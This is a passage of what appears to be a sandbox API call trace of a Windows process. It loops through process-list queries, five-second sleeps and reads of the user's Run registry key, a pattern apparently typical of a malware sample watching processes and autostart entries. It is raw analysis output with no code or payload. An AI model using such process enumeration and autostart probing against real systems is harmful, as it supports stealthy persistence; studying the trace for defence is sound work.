(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.521] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.522] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.522] NtClose (Handle=0x274) returned 0x0 [0180.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.531] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.532] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.532] NtClose (Handle=0x274) returned 0x0 [0180.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.541] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.543] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.544] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.544] NtClose (Handle=0x274) returned 0x0 [0180.544] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.553] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.553] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.554] NtClose (Handle=0x274) returned 0x0 [0180.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.561] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.564] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.564] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.564] NtClose (Handle=0x274) returned 0x0 [0180.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.574] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.575] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.575] NtClose (Handle=0x274) returned 0x0 [0180.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.582] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.583] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.584] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.584] NtClose (Handle=0x274) returned 0x0 [0180.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.593] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.593] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.593] NtClose (Handle=0x274) returned 0x0 [0180.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.602] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.605] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.606] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.606] NtClose (Handle=0x274) returned 0x0 [0180.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.613] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.614] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.615] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.615] NtClose (Handle=0x274) returned 0x0 [0180.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.617] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.623] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.625] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.625] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.625] NtClose (Handle=0x274) returned 0x0 [0180.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.628] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.628] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.634] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.636] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.637] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.637] NtClose (Handle=0x274) returned 0x0 [0180.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.645] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0180.647] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0180.648] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0180.648] NtClose (Handle=0x274) returned 0x0 [0180.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0180.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0180.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0180.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0180.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0180.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0180.659] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 